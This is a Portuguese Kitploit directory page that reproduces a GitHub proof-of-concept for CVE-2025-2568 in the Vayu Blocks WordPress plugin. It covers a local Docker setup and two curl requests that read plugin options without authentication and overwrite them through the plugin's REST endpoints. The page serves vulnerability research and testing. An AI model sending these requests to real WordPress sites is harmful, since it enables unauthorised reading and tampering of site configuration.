Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/shinigami-777/poc_cve-2025-2568
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubshinigami-777/poc_cve-2025-2568

PoC_CVE-2025-2568

Prova de conceito de exploit para CVE-2025-2568, demonstrando acesso não autorizado e modificação das opções do plugin Vayu Blocks do WordPress por meio de verificações de capacidade ausentes.

Ver Repositório
8há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC CVE-2025-2568

Visão Geral

O plugin Vayu Blocks – Gutenberg Blocks para WordPress e WooCommerce é vulnerável a acesso não autorizado e modificação de dados devido à ausência de verificações de capacidade nas funções vayu_blocks_get_toggle_switch_values_callback e vayu_blocks_save_toggle_switch_callback nas versões 1.0.4 a 1.2.1. Isso possibilita que atacantes não autenticados leiam as opções do plugin e atualizem qualquer opção cujo nome de chave termine em _value.

Etapas de Exploração

Configuração (usando docker)

  1. Clone o repositório e siga os passos:
    cd vuln-wordpress
    docker-compose up -d
    
  2. Descompacte o Vayu-Plugin dentro da pasta wp-content/plugins.
    cd wp-content/plugins/
    unzip vayu-blocks.1.2.0.zip
    
    O plugin Vayu-blocks (versão 1.2.0) agora está instalado.

Exploração:

  1. Use isto para ler as opções:
    curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
    
  2. Envie uma requisição POST como esta para modificar os valores das opções.
    curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
     -H "Content-Type: application/json" \
     -d '{"key":"container", "value":"new_value"}'
    

Vídeo de Exploração

wordpressexploit.webm

Baixar ferramenta